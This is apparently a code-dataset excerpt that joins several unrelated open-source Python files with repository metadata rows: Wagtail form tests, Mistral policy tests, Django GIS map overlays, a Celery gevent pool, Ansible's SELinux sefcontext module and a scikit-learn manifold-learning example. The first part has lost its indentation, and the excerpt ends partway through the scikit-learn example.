response = self.client.get(reverse('wagtailforms:index'), {'p': 'Hello world!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got page one
self.assertEqual(response.context['form_pages'].number, 1)
def test_forms_index_pagination_out_of_range(self):
# Create some more form pages to make pagination kick in
self.make_form_pages()
# Get page two
response = self.client.get(reverse('wagtailforms:index'), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index.html')
# Check that it got the last page
self.assertEqual(response.context['form_pages'].number, response.context['form_pages'].paginator.num_pages)
def test_cannot_see_forms_without_permission(self):
# Login with as a user without permission to see forms
self.client.login(username='eventeditor', password='password')
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user cannot see the form page
self.assertFalse(self.form_page in response.context['form_pages'])
def test_can_see_forms_with_permission(self):
response = self.client.get(reverse('wagtailforms:index'))
# Check that the user can see the form page
self.assertIn(self.form_page, response.context['form_pages'])
class TestFormsSubmissions(TestCase, WagtailTestUtils):
def setUp(self):
# Create a form page
self.form_page = make_form_page()
# Add a couple of form submissions
old_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': "this is a really old message",
}),
)
old_form_submission.submit_time = '2013-01-01T12:00:00.000Z'
old_form_submission.save()
new_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': "this is a fairly new message",
}),
)
new_form_submission.submit_time = '2014-01-01T12:00:00.000Z'
new_form_submission.save()
# Login
self.login()
def make_list_submissions(self):
"""
This makes 100 submissions to test pagination on the forms submissions page
"""
for i in range(100):
submission = FormSubmission(
page=self.form_page,
form_data=json.dumps({
'hello': 'world'
})
)
submission.save()
def test_list_submissions(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )))
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 2)
def test_list_submissions_filtering(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
self.assertEqual(len(response.context['data_rows']), 1)
def test_list_submissions_pagination(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 2})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the correct page
self.assertEqual(response.context['submissions'].number, 2)
def test_list_submissions_pagination_invalid(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 'Hello World!'})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got page one
self.assertEqual(response.context['submissions'].number, 1)
def test_list_submissions_pagination_out_of_range(self):
self.make_list_submissions()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'p': 99999})
# Check response
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'wagtailforms/index_submissions.html')
# Check that we got the last page
self.assertEqual(response.context['submissions'].number, response.context['submissions'].paginator.num_pages)
def test_list_submissions_csv_export(self):
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/01/2014', 'action': 'CSV'})
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode().split("\n")[1]
self.assertIn('[email protected]', data_line)
def test_list_submissions_csv_export_with_unicode(self):
unicode_form_submission = FormSubmission.objects.create(
page=self.form_page,
form_data=json.dumps({
'your-email': "[email protected]",
'your-message': 'こんにちは、世界',
}),
)
unicode_form_submission.submit_time = '2014-01-02T12:00:00.000Z'
unicode_form_submission.save()
response = self.client.get(reverse('wagtailforms:list_submissions', args=(self.form_page.id, )), {'date_from': '01/02/2014', 'action': 'CSV'})
# Check response
self.assertEqual(response.status_code, 200)
data_line = response.content.decode('utf-8').split("\n")[1]
self.assertIn('こんにちは、世界', data_line)
class TestDeleteFormSubmission(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/')
    def test_delete_submission_show_confirmation(self):
response = self.client.get(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
        # Check that the confirmation page is shown when the HTTP method is GET
self.assertTemplateUsed(response, 'wagtailforms/confirm_delete.html')
# Check that the deletion has not happened with GET request
self.assertEqual(FormSubmission.objects.count(), 2)
def test_delete_submission_with_permissions(self):
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
# Check that the submission is gone
self.assertEqual(FormSubmission.objects.count(), 1)
# Should be redirected to list of submissions
self.assertRedirects(response, reverse("wagtailforms:list_submissions", args=(self.form_page.id, )))
def test_delete_submission_bad_permissions(self):
self.form_page = make_form_page()
self.client.login(username="eventeditor", password="password")
response = self.client.post(reverse(
'wagtailforms:delete_submission',
args=(self.form_page.id, FormSubmission.objects.first().id)
))
        # Check that the user received a 403 response
self.assertEqual(response.status_code, 403)
# Check that the deletion has not happened
self.assertEqual(FormSubmission.objects.count(), 2)
class TestIssue798(TestCase):
fixtures = ['test.json']
def setUp(self):
self.client.login(username='siteeditor', password='password')
self.form_page = Page.objects.get(url_path='/home/contact-us/').specific
# Add a number field to the page
FormField.objects.create(
page=self.form_page,
label="Your favourite number",
field_type='number',
)
def test_post(self):
response = self.client.post('/contact-us/', {
'your-email': '[email protected]',
'your-message': 'hello world',
'your-choices': {'foo': '', 'bar': '', 'baz': ''},
'your-favourite-number': '7.3',
})
# Check response
self.assertTemplateUsed(response, 'tests/form_page_landing.html')
# Check that form submission was saved correctly
self.assertTrue(FormSubmission.objects.filter(page=self.form_page, form_data__contains='7.3').exists())
| bsd-3-clause | -6,948,488,577,452,455,000 | 36.740175 | 150 | 0.631819 | false |
StackStorm/mistral | mistral/tests/unit/api/test_access_control.py | 1 | 2229 | # Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mistral.api import access_control as acl
from mistral import exceptions as exc
from mistral.tests.unit import base
from mistral.tests.unit.mstrlfixtures import policy_fixtures
class PolicyTestCase(base.BaseTest):
"""Tests whether the configuration of the policy engine is correct."""
def setUp(self):
super(PolicyTestCase, self).setUp()
self.policy = self.useFixture(policy_fixtures.PolicyFixture())
rules = {
"example:admin": "rule:admin_only",
"example:admin_or_owner": "rule:admin_or_owner"
}
self.policy.register_rules(rules)
def test_admin_api_allowed(self):
auth_ctx = base.get_context(default=True, admin=True)
self.assertTrue(
acl.enforce('example:admin', auth_ctx, auth_ctx.to_dict())
)
def test_admin_api_disallowed(self):
auth_ctx = base.get_context(default=True)
self.assertRaises(
exc.NotAllowedException,
acl.enforce,
'example:admin',
auth_ctx,
auth_ctx.to_dict()
)
def test_admin_or_owner_api_allowed(self):
auth_ctx = base.get_context(default=True)
self.assertTrue(
acl.enforce('example:admin_or_owner', auth_ctx, auth_ctx.to_dict())
)
def test_admin_or_owner_api_disallowed(self):
auth_ctx = base.get_context(default=True)
target = {'project_id': 'another'}
self.assertRaises(
exc.NotAllowedException,
acl.enforce,
'example:admin_or_owner',
auth_ctx,
target
)
| apache-2.0 | -7,675,515,347,808,505,000 | 30.842857 | 79 | 0.647824 | false |
beni55/django | django/contrib/gis/maps/google/overlays.py | 13 | 11940 | from __future__ import unicode_literals
from django.contrib.gis.geos import (
LinearRing, LineString, Point, Polygon, fromstr,
)
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import total_ordering
from django.utils.safestring import mark_safe
@python_2_unicode_compatible
class GEvent(object):
"""
A Python wrapper for the Google GEvent object.
Events can be attached to any object derived from GOverlayBase with the
add_event() call.
For more information please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GEvent
Example:
from django.shortcuts import render_to_response
from django.contrib.gis.maps.google import GoogleMap, GEvent, GPolyline
def sample_request(request):
polyline = GPolyline('LINESTRING(101 26, 112 26, 102 31)')
event = GEvent('click',
'function() { location.href = "http://www.google.com"}')
polyline.add_event(event)
return render_to_response('mytemplate.html',
{'google' : GoogleMap(polylines=[polyline])})
"""
def __init__(self, event, action):
"""
Initializes a GEvent object.
Parameters:
event:
string for the event, such as 'click'. The event must be a valid
event for the object in the Google Maps API.
There is no validation of the event type within Django.
action:
string containing a Javascript function, such as
'function() { location.href = "newurl";}'
The string must be a valid Javascript function. Again there is no
        validation of the function within Django.
"""
self.event = event
self.action = action
def __str__(self):
"Returns the parameter part of a GEvent."
return mark_safe('"%s", %s' % (self.event, self.action))
@python_2_unicode_compatible
class GOverlayBase(object):
def __init__(self):
self.events = []
def latlng_from_coords(self, coords):
"Generates a JavaScript array of GLatLng objects for the given coordinates."
return '[%s]' % ','.join('new GLatLng(%s,%s)' % (y, x) for x, y in coords)
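        # e.g. latlng_from_coords([(-104.9, 39.7), (-105.0, 39.8)]) returns
        # '[new GLatLng(39.7,-104.9),new GLatLng(39.8,-105.0)]'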
def add_event(self, event):
"Attaches a GEvent to the overlay object."
self.events.append(event)
def __str__(self):
"The string representation is the JavaScript API call."
return mark_safe('%s(%s)' % (self.__class__.__name__, self.js_params))
class GPolygon(GOverlayBase):
"""
A Python wrapper for the Google GPolygon object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GPolygon
"""
def __init__(self, poly,
stroke_color='#0000ff', stroke_weight=2, stroke_opacity=1,
fill_color='#0000ff', fill_opacity=0.4):
"""
        The GPolygon object initializes on a GEOS Polygon or a parameter that
        may be instantiated into a GEOS Polygon. Please note that this will
        not depict a Polygon's internal rings.
Keyword Options:
stroke_color:
The color of the polygon outline. Defaults to '#0000ff' (blue).
stroke_weight:
The width of the polygon outline, in pixels. Defaults to 2.
stroke_opacity:
The opacity of the polygon outline, between 0 and 1. Defaults to 1.
fill_color:
The color of the polygon fill. Defaults to '#0000ff' (blue).
fill_opacity:
The opacity of the polygon fill. Defaults to 0.4.
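        Example (an illustrative sketch; it assumes GoogleMap also accepts a
        ``polygons`` keyword, analogous to the ``polylines`` example in GEvent):
            from django.shortcuts import render_to_response
            from django.contrib.gis.maps.google import GoogleMap, GPolygon
            def sample_request(request):
                poly = GPolygon('POLYGON((101 26, 112 26, 102 31, 101 26))',
                                fill_color='#ff0000')
                return render_to_response('mytemplate.html',
                                          {'google': GoogleMap(polygons=[poly])})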
"""
if isinstance(poly, six.string_types):
poly = fromstr(poly)
if isinstance(poly, (tuple, list)):
poly = Polygon(poly)
if not isinstance(poly, Polygon):
raise TypeError('GPolygon may only initialize on GEOS Polygons.')
# Getting the envelope of the input polygon (used for automatically
# determining the zoom level).
self.envelope = poly.envelope
# Translating the coordinates into a JavaScript array of
# Google `GLatLng` objects.
self.points = self.latlng_from_coords(poly.shell.coords)
# Stroke settings.
self.stroke_color, self.stroke_opacity, self.stroke_weight = stroke_color, stroke_opacity, stroke_weight
# Fill settings.
self.fill_color, self.fill_opacity = fill_color, fill_opacity
super(GPolygon, self).__init__()
@property
def js_params(self):
return '%s, "%s", %s, %s, "%s", %s' % (self.points, self.stroke_color, self.stroke_weight, self.stroke_opacity,
self.fill_color, self.fill_opacity)
class GPolyline(GOverlayBase):
"""
A Python wrapper for the Google GPolyline object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GPolyline
"""
def __init__(self, geom, color='#0000ff', weight=2, opacity=1):
"""
        The GPolyline object may be initialized on GEOS LineString, LinearRing,
        and Polygon objects (internal rings not supported) or a parameter that
        may be instantiated into one of the above geometries.
Keyword Options:
color:
The color to use for the polyline. Defaults to '#0000ff' (blue).
weight:
The width of the polyline, in pixels. Defaults to 2.
opacity:
The opacity of the polyline, between 0 and 1. Defaults to 1.
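        Example (an illustrative sketch; the coordinates are made up):
            from django.shortcuts import render_to_response
            from django.contrib.gis.maps.google import GoogleMap, GPolyline
            def sample_request(request):
                line = GPolyline('LINESTRING(101 26, 112 26, 102 31)',
                                 color='#00ff00', weight=3)
                return render_to_response('mytemplate.html',
                                          {'google': GoogleMap(polylines=[line])})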
"""
# If a GEOS geometry isn't passed in, try to construct one.
if isinstance(geom, six.string_types):
geom = fromstr(geom)
if isinstance(geom, (tuple, list)):
geom = Polygon(geom)
# Generating the lat/lng coordinate pairs.
if isinstance(geom, (LineString, LinearRing)):
self.latlngs = self.latlng_from_coords(geom.coords)
elif isinstance(geom, Polygon):
self.latlngs = self.latlng_from_coords(geom.shell.coords)
else:
raise TypeError('GPolyline may only initialize on GEOS LineString, LinearRing, and/or Polygon geometries.')
# Getting the envelope for automatic zoom determination.
self.envelope = geom.envelope
self.color, self.weight, self.opacity = color, weight, opacity
super(GPolyline, self).__init__()
@property
def js_params(self):
return '%s, "%s", %s, %s' % (self.latlngs, self.color, self.weight, self.opacity)
@total_ordering
class GIcon(object):
"""
Creates a GIcon object to pass into a Gmarker object.
The keyword arguments map to instance attributes of the same name. These,
in turn, correspond to a subset of the attributes of the official GIcon
javascript object:
http://code.google.com/apis/maps/documentation/reference.html#GIcon
Because a Google map often uses several different icons, a name field has
been added to the required arguments.
Required Arguments:
varname:
A string which will become the basis for the js variable name of
the marker, for this reason, your code should assign a unique
name for each GIcon you instantiate, otherwise there will be
name space collisions in your javascript.
Keyword Options:
image:
The url of the image to be used as the icon on the map defaults
to 'G_DEFAULT_ICON'
iconsize:
a tuple representing the pixel size of the foreground (not the
shadow) image of the icon, in the format: (width, height) ex.:
GIcon('fast_food',
image="/media/icon/star.png",
iconsize=(15,10))
Would indicate your custom icon was 15px wide and 10px height.
shadow:
the url of the image of the icon's shadow
shadowsize:
a tuple representing the pixel size of the shadow image, format is
the same as ``iconsize``
iconanchor:
a tuple representing the pixel coordinate relative to the top left
corner of the icon image at which this icon is anchored to the map.
In (x, y) format. x increases to the right in the Google Maps
coordinate system and y increases downwards in the Google Maps
        coordinate system.
infowindowanchor:
The pixel coordinate relative to the top left corner of the icon
image at which the info window is anchored to this icon.
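    Example (an illustrative sketch; the image path and sizes are made up):
        from django.contrib.gis.maps.google import GIcon, GMarker
        flag = GIcon('flag',
                     image='/media/icons/flag.png',
                     iconsize=(19, 32),
                     iconanchor=(9, 32))
        marker = GMarker('POINT(101 26)', title='Flagged', icon=flag)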
"""
def __init__(self, varname, image=None, iconsize=None,
shadow=None, shadowsize=None, iconanchor=None,
infowindowanchor=None):
self.varname = varname
self.image = image
self.iconsize = iconsize
self.shadow = shadow
self.shadowsize = shadowsize
self.iconanchor = iconanchor
self.infowindowanchor = infowindowanchor
def __eq__(self, other):
return self.varname == other.varname
def __lt__(self, other):
return self.varname < other.varname
def __hash__(self):
# XOR with hash of GIcon type so that hash('varname') won't
# equal hash(GIcon('varname')).
return hash(self.__class__) ^ hash(self.varname)
class GMarker(GOverlayBase):
"""
A Python wrapper for the Google GMarker object. For more information
please see the Google Maps API Reference:
http://code.google.com/apis/maps/documentation/reference.html#GMarker
Example:
from django.shortcuts import render_to_response
from django.contrib.gis.maps.google.overlays import GMarker, GEvent
def sample_request(request):
marker = GMarker('POINT(101 26)')
event = GEvent('click',
'function() { location.href = "http://www.google.com"}')
marker.add_event(event)
return render_to_response('mytemplate.html',
{'google' : GoogleMap(markers=[marker])})
"""
def __init__(self, geom, title=None, draggable=False, icon=None):
"""
The GMarker object may initialize on GEOS Points or a parameter
that may be instantiated into a GEOS point. Keyword options map to
GMarkerOptions -- so far only the title option is supported.
Keyword Options:
title:
Title option for GMarker, will be displayed as a tooltip.
draggable:
Draggable option for GMarker, disabled by default.
"""
# If a GEOS geometry isn't passed in, try to construct one.
if isinstance(geom, six.string_types):
geom = fromstr(geom)
if isinstance(geom, (tuple, list)):
geom = Point(geom)
if isinstance(geom, Point):
self.latlng = self.latlng_from_coords(geom.coords)
else:
raise TypeError('GMarker may only initialize on GEOS Point geometry.')
# Getting the envelope for automatic zoom determination.
self.envelope = geom.envelope
# TODO: Add support for more GMarkerOptions
self.title = title
self.draggable = draggable
self.icon = icon
super(GMarker, self).__init__()
def latlng_from_coords(self, coords):
return 'new GLatLng(%s,%s)' % (coords[1], coords[0])
def options(self):
result = []
if self.title:
result.append('title: "%s"' % self.title)
if self.icon:
result.append('icon: %s' % self.icon.varname)
if self.draggable:
result.append('draggable: true')
return '{%s}' % ','.join(result)
@property
def js_params(self):
return '%s, %s' % (self.latlng, self.options())
| bsd-3-clause | 5,867,305,581,385,733,000 | 35.402439 | 119 | 0.622027 | false |
liberorbis/libernext | env/lib/python2.7/site-packages/celery/concurrency/gevent.py | 8 | 3510 | # -*- coding: utf-8 -*-
"""
celery.concurrency.gevent
~~~~~~~~~~~~~~~~~~~~~~~~~
gevent pool implementation.
"""
from __future__ import absolute_import
from time import time
try:
from gevent import Timeout
except ImportError: # pragma: no cover
Timeout = None # noqa
from celery.utils import timer2
from .base import apply_target, BasePool
__all__ = ['TaskPool']
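# Usage sketch (assumed invocation): this pool is selected via the worker's
# -P/--pool option, e.g.:
#   celery -A proj worker -P gevent -c 1000
# where -c sets the greenlet pool size (the ``limit`` given to TaskPool).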
def apply_timeout(target, args=(), kwargs={}, callback=None,
accept_callback=None, pid=None, timeout=None,
timeout_callback=None, Timeout=Timeout,
apply_target=apply_target, **rest):
try:
with Timeout(timeout):
return apply_target(target, args, kwargs, callback,
accept_callback, pid,
propagate=(Timeout, ), **rest)
except Timeout:
return timeout_callback(False, timeout)
class Schedule(timer2.Schedule):
def __init__(self, *args, **kwargs):
from gevent.greenlet import Greenlet, GreenletExit
class _Greenlet(Greenlet):
cancel = Greenlet.kill
self._Greenlet = _Greenlet
self._GreenletExit = GreenletExit
super(Schedule, self).__init__(*args, **kwargs)
self._queue = set()
def _enter(self, eta, priority, entry):
secs = max(eta - time(), 0)
g = self._Greenlet.spawn_later(secs, entry)
self._queue.add(g)
g.link(self._entry_exit)
g.entry = entry
g.eta = eta
g.priority = priority
g.cancelled = False
return g
def _entry_exit(self, g):
try:
g.kill()
finally:
self._queue.discard(g)
def clear(self):
queue = self._queue
while queue:
try:
queue.pop().kill()
except KeyError:
pass
@property
def queue(self):
return self._queue
class Timer(timer2.Timer):
Schedule = Schedule
def ensure_started(self):
pass
def stop(self):
self.schedule.clear()
def start(self):
pass
class TaskPool(BasePool):
Timer = Timer
signal_safe = False
is_green = True
task_join_will_block = False
def __init__(self, *args, **kwargs):
from gevent import spawn_raw
from gevent.pool import Pool
self.Pool = Pool
self.spawn_n = spawn_raw
self.timeout = kwargs.get('timeout')
super(TaskPool, self).__init__(*args, **kwargs)
def on_start(self):
self._pool = self.Pool(self.limit)
self._quick_put = self._pool.spawn
def on_stop(self):
if self._pool is not None:
self._pool.join()
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, timeout=None,
timeout_callback=None, **_):
timeout = self.timeout if timeout is None else timeout
return self._quick_put(apply_timeout if timeout else apply_target,
target, args, kwargs, callback, accept_callback,
timeout=timeout,
timeout_callback=timeout_callback)
def grow(self, n=1):
self._pool._semaphore.counter += n
self._pool.size += n
def shrink(self, n=1):
self._pool._semaphore.counter -= n
self._pool.size -= n
@property
def num_processes(self):
return len(self._pool)
| gpl-2.0 | -4,081,642,633,367,579,600 | 24.808824 | 79 | 0.553561 | false |
defionscode/ansible | lib/ansible/modules/system/sefcontext.py | 3 | 9116 | #!/usr/bin/python
# Copyright: (c) 2016, Dag Wieers (@dagwieers) <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: sefcontext
short_description: Manages SELinux file context mapping definitions
description:
- Manages SELinux file context mapping definitions.
- Similar to the C(semanage fcontext) command.
version_added: '2.2'
options:
target:
description:
- Target path (expression).
type: str
required: yes
aliases: [ path ]
ftype:
description:
- The file type that should have SELinux contexts applied.
- "The following file type options are available:"
- C(a) for all files,
- C(b) for block devices,
- C(c) for character devices,
- C(d) for directories,
- C(f) for regular files,
- C(l) for symbolic links,
- C(p) for named pipes,
- C(s) for socket files.
type: str
default: a
setype:
description:
    - SELinux type for the specified target.
    type: str
    required: yes
seuser:
description:
- SELinux user for the specified target.
type: str
selevel:
description:
- SELinux range for the specified target.
type: str
aliases: [ serange ]
state:
description:
- Whether the SELinux file context must be C(absent) or C(present).
type: str
choices: [ absent, present ]
default: present
reload:
description:
- Reload SELinux policy after commit.
- Note that this does not apply SELinux file contexts to existing files.
type: bool
default: 'yes'
notes:
- The changes are persistent across reboots.
- The M(sefcontext) module does not apply the new SELinux context(s) to
  existing files, so it is advisable to first create the SELinux
  file contexts before creating files, or to run C(restorecon) manually
  for the existing files that require the new SELinux file contexts.
- Not applying SELinux fcontexts to existing files is a deliberate
  decision, as it would be unclear what the reported changes would
  entail, and there is no guarantee that applying the SELinux fcontext
  would not pick up other unrelated prior changes.
requirements:
- libselinux-python
- policycoreutils-python
author:
- Dag Wieers (@dagwieers)
'''
EXAMPLES = r'''
- name: Allow apache to modify files in /srv/git_repos
sefcontext:
target: '/srv/git_repos(/.*)?'
setype: httpd_git_rw_content_t
state: present
- name: Apply new SELinux file context to filesystem
command: restorecon -irv /srv/git_repos
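
# A hypothetical sketch (not part of the module's original examples):
# removing a previously added mapping, using the documented C(absent) state.
- name: Remove SELinux file context mapping for /srv/git_repos
  sefcontext:
    target: '/srv/git_repos(/.*)?'
    setype: httpd_git_rw_content_t
    state: absent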
'''
RETURN = r'''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils._text import to_native
try:
import selinux
HAVE_SELINUX = True
except ImportError:
HAVE_SELINUX = False
try:
import seobject
HAVE_SEOBJECT = True
except ImportError:
HAVE_SEOBJECT = False
# Add missing entries (backward compatible)
if HAVE_SEOBJECT:
seobject.file_types.update(dict(
a=seobject.SEMANAGE_FCONTEXT_ALL,
b=seobject.SEMANAGE_FCONTEXT_BLOCK,
c=seobject.SEMANAGE_FCONTEXT_CHAR,
d=seobject.SEMANAGE_FCONTEXT_DIR,
f=seobject.SEMANAGE_FCONTEXT_REG,
l=seobject.SEMANAGE_FCONTEXT_LINK,
p=seobject.SEMANAGE_FCONTEXT_PIPE,
s=seobject.SEMANAGE_FCONTEXT_SOCK,
))
# Map single-letter ftype options to seobject's human-readable file type strings (backward compatible)
option_to_file_type_str = dict(
a='all files',
b='block device',
c='character device',
d='directory',
f='regular file',
l='symbolic link',
p='named pipe',
s='socket file',
)
def semanage_fcontext_exists(sefcontext, target, ftype):
''' Get the SELinux file context mapping definition from policy. Return None if it does not exist. '''
    # Beware that records are keyed by a string representation of the file_type
record = (target, option_to_file_type_str[ftype])
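    # For example (illustrative values only), a record key looks like
    #   ('/srv/git_repos(/.*)?', 'all files')
    # and maps to a (seuser, serole, setype, serange) tuple such as
    #   ('system_u', 'object_r', 'httpd_git_rw_content_t', 's0').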
records = sefcontext.get_all()
try:
return records[record]
except KeyError:
return None
def semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser, sestore=''):
''' Add or modify SELinux file context mapping definition to the policy. '''
changed = False
prepared_diff = ''
try:
sefcontext = seobject.fcontextRecords(sestore)
sefcontext.set_reload(do_reload)
exists = semanage_fcontext_exists(sefcontext, target, ftype)
if exists:
# Modify existing entry
orig_seuser, orig_serole, orig_setype, orig_serange = exists
if seuser is None:
seuser = orig_seuser
if serange is None:
serange = orig_serange
if setype != orig_setype or seuser != orig_seuser or serange != orig_serange:
if not module.check_mode:
sefcontext.modify(target, setype, ftype, serange, seuser)
changed = True
if module._diff:
prepared_diff += '# Change to semanage file context mappings\n'
prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, orig_seuser, orig_serole, orig_setype, orig_serange)
prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, orig_serole, setype, serange)
else:
# Add missing entry
if seuser is None:
seuser = 'system_u'
if serange is None:
serange = 's0'
if not module.check_mode:
sefcontext.add(target, setype, ftype, serange, seuser)
changed = True
if module._diff:
prepared_diff += '# Addition to semanage file context mappings\n'
prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, 'object_r', setype, serange)
except Exception:
e = get_exception()
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)))
if module._diff and prepared_diff:
result['diff'] = dict(prepared=prepared_diff)
module.exit_json(changed=changed, seuser=seuser, serange=serange, **result)
def semanage_fcontext_delete(module, result, target, ftype, do_reload, sestore=''):
''' Delete SELinux file context mapping definition from the policy. '''
changed = False
prepared_diff = ''
try:
sefcontext = seobject.fcontextRecords(sestore)
sefcontext.set_reload(do_reload)
exists = semanage_fcontext_exists(sefcontext, target, ftype)
if exists:
# Remove existing entry
orig_seuser, orig_serole, orig_setype, orig_serange = exists
if not module.check_mode:
sefcontext.delete(target, ftype)
changed = True
if module._diff:
prepared_diff += '# Deletion to semanage file context mappings\n'
prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, exists[0], exists[1], exists[2], exists[3])
except Exception:
e = get_exception()
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)))
if module._diff and prepared_diff:
result['diff'] = dict(prepared=prepared_diff)
module.exit_json(changed=changed, **result)
def main():
module = AnsibleModule(
argument_spec=dict(
target=dict(required=True, aliases=['path']),
ftype=dict(type='str', default='a', choices=option_to_file_type_str.keys()),
setype=dict(type='str', required=True),
seuser=dict(type='str'),
selevel=dict(type='str', aliases=['serange']),
state=dict(type='str', default='present', choices=['absent', 'present']),
reload=dict(type='bool', default=True),
),
supports_check_mode=True,
)
if not HAVE_SELINUX:
module.fail_json(msg="This module requires libselinux-python")
if not HAVE_SEOBJECT:
module.fail_json(msg="This module requires policycoreutils-python")
if not selinux.is_selinux_enabled():
module.fail_json(msg="SELinux is disabled on this host.")
target = module.params['target']
ftype = module.params['ftype']
setype = module.params['setype']
seuser = module.params['seuser']
serange = module.params['selevel']
state = module.params['state']
do_reload = module.params['reload']
result = dict(target=target, ftype=ftype, setype=setype, state=state)
if state == 'present':
semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser)
elif state == 'absent':
semanage_fcontext_delete(module, result, target, ftype, do_reload)
else:
module.fail_json(msg='Invalid value of argument "state": {0}'.format(state))
if __name__ == '__main__':
main()
| gpl-3.0 | 8,070,996,363,429,504,000 | 31.673835 | 140 | 0.632405 | false |
treycausey/scikit-learn | examples/manifold/plot_manifold_sphere.py | 8 | 4585 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=============================================
Manifold Learning methods on a severed sphere
=============================================
An application of the different :ref:`manifold` techniques
on a spherical data-set. Here one can see the use of
dimensionality reduction in order to gain some intuition
regarding the Manifold learning methods. Regarding the dataset,
the poles are cut from the sphere, as well as a thin slice down its
side. This enables the manifold learning techniques to
'spread it open' whilst projecting it onto two dimensions.
For a similar example, where the methods are applied to the
S-curve dataset, see :ref:`example_manifold_plot_compare_methods.py`
Note that the purpose of the :ref:`MDS <multidimensional_scaling>` is
to find a low-dimensional representation of the data (here 2D) in
which the distances respect well the distances in the original
high-dimensional space. Unlike other manifold-learning algorithms,
it does not seek an isotropic representation of the data in
the low-dimensional space. Here the manifold problem fairly matches
that of representing a flat map of the Earth, as with a
`map projection <http://en.wikipedia.org/wiki/Map_projection>`_
"""
# Author: Jaques Grobler <[email protected]>
# License: BSD 3 clause
print(__doc__)
from time import time
import numpy as np
import pylab as pl
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import NullFormatter
from sklearn import manifold
from sklearn.utils import check_random_state
# Next line to silence pyflakes.
Axes3D
# Variables for manifold learning.
n_neighbors = 10
n_samples = 1000
# Create our sphere.
random_state = check_random_state(0)
p = random_state.rand(n_samples) * (2 * np.pi - 0.55)
t = random_state.rand(n_samples) * np.pi
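# p is the azimuthal angle (its range stops 0.55 radians short of a full
# 2*pi turn, which severs a thin slice down the side) and t is the polar angle.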
# Sever the poles from the sphere.
indices = ((t < (np.pi - (np.pi / 8))) & (t > ((np.pi / 8))))
colors = p[indices]
x, y, z = np.sin(t[indices]) * np.cos(p[indices]), \
np.sin(t[indices]) * np.sin(p[indices]), \
np.cos(t[indices])
# Plot our dataset.
fig = pl.figure(figsize=(15, 8))
pl.suptitle("Manifold Learning with %i points, %i neighbors"
            % (n_samples, n_neighbors), fontsize=14)
ax = fig.add_subplot(241, projection='3d')
ax.scatter(x, y, z, c=p[indices], cmap=pl.cm.rainbow)
try:
    # compatibility matplotlib < 1.0
    ax.view_init(40, -10)
except Exception:
    pass
sphere_data = np.array([x, y, z]).T
# Perform Locally Linear Embedding Manifold learning
methods = ['standard', 'ltsa', 'hessian', 'modified']
labels = ['LLE', 'LTSA', 'Hessian LLE', 'Modified LLE']
for i, method in enumerate(methods):
t0 = time()
trans_data = manifold\
.LocallyLinearEmbedding(n_neighbors, 2,
method=method).fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % (methods[i], t1 - t0))
ax = fig.add_subplot(242 + i)
